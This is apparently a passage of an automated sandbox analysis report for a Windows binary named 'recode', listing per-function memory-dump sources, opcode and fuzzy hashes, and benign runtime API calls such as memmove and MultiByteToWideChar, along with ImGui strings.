                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: ceilf$cosfsinf
                            • String ID:
                            • API String ID: 125261001-0
                            • Opcode ID: bc58f9fe8f297e19e4bd16ce9f371bf510dbb18985579d327c967330b97f3463
                            • Instruction ID: 1fa38b4fac1f8af8399b18370afc82482f32624bb8de9026080adb3b2f9a17e2
                            • Opcode Fuzzy Hash: bc58f9fe8f297e19e4bd16ce9f371bf510dbb18985579d327c967330b97f3463
                            • Instruction Fuzzy Hash: C8A13D21E186C987E663A736E0412A9F350AF6D344F5C9732E98E321F1EF6DF0D98614
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 451eadae1e0d701bb950b7ebe1408d94740019218ad499df2b720e2fcf1e283e
                            • Instruction ID: b854568c25def3bfc191ed5029ce12c1c4ad75277b11924b01f5d0870a0671a3
                            • Opcode Fuzzy Hash: 451eadae1e0d701bb950b7ebe1408d94740019218ad499df2b720e2fcf1e283e
                            • Instruction Fuzzy Hash: 9A81A002E18ACE82F2A3753691436FCE2805FBE285EAD9733F94D350E39F5876DA4014
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                            • String ID:
                            • API String ID: 2016347663-0
                            • Opcode ID: 041666be752f0d877f283caba22f191f3ee315efa7d982ea41cbf8a8612688dc
                            • Instruction ID: ccffdade7496fcfc005bf1191fd4508b9ee392112bc786c15d434a0f9bf3cb5e
                            • Opcode Fuzzy Hash: 041666be752f0d877f283caba22f191f3ee315efa7d982ea41cbf8a8612688dc
                            • Instruction Fuzzy Hash: CE51C132E08B8193FA10AF61D644269A360FB15B84F9C4632DF6C177E2DF38E599D354
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmovememset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                            • String ID:
                            • API String ID: 2171940698-0
                            • Opcode ID: 7dd8340ef7fcd983fb3ab394d37465c11bd38e4114702af85f826c69b2d15a69
                            • Instruction ID: d248b22961726c24aa3979375bfe27f77a97f8b3e4653e69c635bf305130d085
                            • Opcode Fuzzy Hash: 7dd8340ef7fcd983fb3ab394d37465c11bd38e4114702af85f826c69b2d15a69
                            • Instruction Fuzzy Hash: E0411861B08A81C6EA21FB12E10436EE391AB04BD4FC94635DEAD07BE5CE3CD149C318
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove
                            • String ID: ##previewing_picker$##selectable$Alpha Bar$context
                            • API String ID: 2162964266-280553805
                            • Opcode ID: ac797292b5c4a29898d144dc51c65400cc14d7787965633162681148a35cc121
                            • Instruction ID: 6dbe3889fd1593c0762367e26f4600b1b4321b6b65017e49b4ed7886e16aa919
                            • Opcode Fuzzy Hash: ac797292b5c4a29898d144dc51c65400cc14d7787965633162681148a35cc121
                            • Instruction Fuzzy Hash: 5661E532A1868583E761AB26E8413BAF790FF85350FCC4231EA8D572E1DF3CE5498B14
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                            • String ID:
                            • API String ID: 2016347663-0
                            • Opcode ID: 8d67c873f691889687a25a05f7c6aacda81ab70175806d645386a33a3fd64527
                            • Instruction ID: b20c9bf39fd2477b1fa62a2109464ac4d796ebb9aed276b93875379073988102
                            • Opcode Fuzzy Hash: 8d67c873f691889687a25a05f7c6aacda81ab70175806d645386a33a3fd64527
                            • Instruction Fuzzy Hash: 8141B662B08A86C6EE21FB12A50426AE355BB04BD4FCC4631DEAD077C6DF7CE0459328
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: Sleep$Query_perf_counterQuery_perf_frequency
                            • String ID:
                            • API String ID: 1739919806-0
                            • Opcode ID: 420da8ebd6776998d6cdbc5d0d302419e121f5423e74a88c39f72df4b33c9da7
                            • Instruction ID: 124ce696de670ea9c1d7aa23d9f964b6f289b4caed05f31385f87fda388520b2
                            • Opcode Fuzzy Hash: 420da8ebd6776998d6cdbc5d0d302419e121f5423e74a88c39f72df4b33c9da7
                            • Instruction Fuzzy Hash: B6311461F0934A03FE28AA59A5152BAC2519F88BD0F8C9236D95E0F7F2FC7DF4498314
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E3EB
                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E40D
                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E476
                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E49A
                            • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E4A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$_wfopen
                            • String ID:
                            • API String ID: 1670196454-0
                            • Opcode ID: 1f1a8d6932528ea41ac1b29b289a75a3390c02b7388808cd62345f2db7561aef
                            • Instruction ID: c41de06cc614ced398852baa484c3a263c1af751c5b8dd2efbb07288e288b4d3
                            • Opcode Fuzzy Hash: 1f1a8d6932528ea41ac1b29b289a75a3390c02b7388808cd62345f2db7561aef
                            • Instruction Fuzzy Hash: 26315232609B8286E724AF56A85013AF6A1FB88BD0F9C4239DA9D57BE5DF3CD0058714
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                            • String ID:
                            • API String ID: 2138705365-0
                            • Opcode ID: 1f258f5684e2129413365762fd76f50ae9fa24140979823365c0883e3c78df7a
                            • Instruction ID: 37fd607691dbeebc5f36286ca73f647d41c2a8c080f255b3c41316a9faa05fdb
                            • Opcode Fuzzy Hash: 1f258f5684e2129413365762fd76f50ae9fa24140979823365c0883e3c78df7a
                            • Instruction Fuzzy Hash: AE817172A04A85D2EB05EF29E48436CE365FB44F88FD84032DA4D076A9DF78D9D9C354
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: powf
                            • String ID:
                            • API String ID: 3445610689-0
                            • Opcode ID: 7e884747b8af81ce02f81c8d44412077219ee735e734bf570d693c57e63700e8
                            • Instruction ID: 30c3b1b2d498aa1f420f6fac887f2166ea8fca5a52635cd1fb3c5f9f476e5fe1
                            • Opcode Fuzzy Hash: 7e884747b8af81ce02f81c8d44412077219ee735e734bf570d693c57e63700e8
                            • Instruction Fuzzy Hash: 52618F22C28B8D82F023623791430F6E6905F7F246EACDB23F99C355F19F19B5CA6118
                            APIs
                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF758001A25), ref: 00007FF7580032E4
                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF758001A25), ref: 00007FF758003334
                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF758001A25), ref: 00007FF75800333E
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF758003387
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                            • String ID:
                            • API String ID: 2016347663-0
                            • Opcode ID: 2b50664d9895a9ebe83a9936526915c8d2872e887b59c1edcbdb80d6d4381a11
                            • Instruction ID: 65e436244a1a96c75de4ef837c65df10bd0935c1fa5d2137d279d0af70c8d646
                            • Opcode Fuzzy Hash: 2b50664d9895a9ebe83a9936526915c8d2872e887b59c1edcbdb80d6d4381a11
                            • Instruction Fuzzy Hash: B341AE62B08A8192EA15EB12E14416DE390BB44BE4FD94735EA7D07BD4EF3CE04AC318
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                            • String ID:
                            • API String ID: 2016347663-0
                            • Opcode ID: c8c8c26d43e09b7e850ebd019a0cc54fdadab2a66a6ed7130621ffea5c311180
                            • Instruction ID: 6b0b55038b2f1a539ad109230dc41d54c906b4d2f01a71d7a6454f22255de2ce
                            • Opcode Fuzzy Hash: c8c8c26d43e09b7e850ebd019a0cc54fdadab2a66a6ed7130621ffea5c311180
                            • Instruction Fuzzy Hash: 8F31092270878186EE16EF12D54436DE351AB04BD4FC90635DA6D0FBC5DE3CE0498318
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove
                            • String ID:
                            • API String ID: 2162964266-0
                            • Opcode ID: ea7894f2927e8f2b34c84c2d86d6bab33a3e4f012fec9ce584e05b276012386e
                            • Instruction ID: cd6c65c35ddb9dadf07b12ea1b32fb81d18cd17c2e6ca49c9f531e40066b6280
                            • Opcode Fuzzy Hash: ea7894f2927e8f2b34c84c2d86d6bab33a3e4f012fec9ce584e05b276012386e
                            • Instruction Fuzzy Hash: BA31E433F0578186FA157B65A5403B9D250AB44BE9FAC0231DE6C0B7E2DE7C94C68364
                            APIs
                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,00007FF7580020B9), ref: 00007FF75800306C
                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,00007FF7580020B9), ref: 00007FF7580030A0
                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,00007FF7580020B9), ref: 00007FF7580030AA
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7580030D3
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                            • String ID:
                            • API String ID: 2016347663-0
                            • Opcode ID: 11bf5eb280c4525fc68ff5f360c2f1326b8ba35f243bdb200eb7ac24a2820396
                            • Instruction ID: bc2fefa85e5b99763ab1e82bafcba7fd6c5c393cbd75ec1bd7b8d8955d84e40a
                            • Opcode Fuzzy Hash: 11bf5eb280c4525fc68ff5f360c2f1326b8ba35f243bdb200eb7ac24a2820396
                            • Instruction Fuzzy Hash: 6F31F662B09B45C6EE11FB51E4143BAE351AB04BD4FEC0631DA6D077D5DE3CE0898328
                            APIs
                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,7FFFFFFFFFFFFFFF,?,?), ref: 00007FF7580463A6
                            • memmove.VCRUNTIME140(?,7FFFFFFFFFFFFFFF,?,?), ref: 00007FF7580463C9
                            • memmove.VCRUNTIME140(?,7FFFFFFFFFFFFFFF,?,?), ref: 00007FF7580463D8
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7580463F9
                              • Part of subcall function 00007FF75805E490: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF758001050), ref: 00007FF75805E4AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                            • String ID:
                            • API String ID: 2075926362-0
                            • Opcode ID: 81b23eba5bb18c0099888dd0aab49fdbcfc5110e8b58bad0e52a927794c3d872
                            • Instruction ID: 70fa03d3e9828ca5639eb30a5a89cc8c6793ffbaaf7cf5c42cccb34965ad0747
                            • Opcode Fuzzy Hash: 81b23eba5bb18c0099888dd0aab49fdbcfc5110e8b58bad0e52a927794c3d872
                            • Instruction Fuzzy Hash: 0A31D922F4568582FE24AF52E5013BAE251AF44BE4F9C4631DEBD477D1EE3CE0898314
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove$Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 1247048853-0
                            • Opcode ID: 05cd3845b840d3792c2e897e94c4d63ad794183fdbdbf34c3f5be91ce9576ca4
                            • Instruction ID: 899f5e7a53d26a40257c11d1990040c8b42998846d4ed1fe96f797f38609693a
                            • Opcode Fuzzy Hash: 05cd3845b840d3792c2e897e94c4d63ad794183fdbdbf34c3f5be91ce9576ca4
                            • Instruction Fuzzy Hash: D231C272B4A74186EA24BF52A4002B9E290AB047F4FDC0B30EEBD177E5DE7CE4958314
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memset
                            • String ID: imgui.ini$imgui_log.txt
                            • API String ID: 2221118986-3179804127
                            • Opcode ID: 9604c0c4c3dc16009807ad666d92c0873ae813ac4ab9565bf436d71af7b77d14
                            • Instruction ID: 9c0760d8ca1042e3a767605e0b0f85fdc8d2b3ae40c77bcbf1c03fb6c4fefe4d
                            • Opcode Fuzzy Hash: 9604c0c4c3dc16009807ad666d92c0873ae813ac4ab9565bf436d71af7b77d14
                            • Instruction Fuzzy Hash: 9F51F7F21057819AC711EF39D564389BBACF721B48F688239DA580F7A8CB728159CB94
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove$Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 1247048853-0
                            • Opcode ID: 17bdc4cbfafedb4f7405804ec96cde804c1820f6ec73a23ebd27b513ab11e5b6
                            • Instruction ID: ffe9426e4f444fbe7dd2b00ba06d1f18c2a57638e14eea18ede2b2d9d3d4ab5c
                            • Opcode Fuzzy Hash: 17bdc4cbfafedb4f7405804ec96cde804c1820f6ec73a23ebd27b513ab11e5b6
                            • Instruction Fuzzy Hash: 4721C922B09B45CAEA15BB51A5403B9D2509F097A5FDD0630DE7D077D2DE7C90968324
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
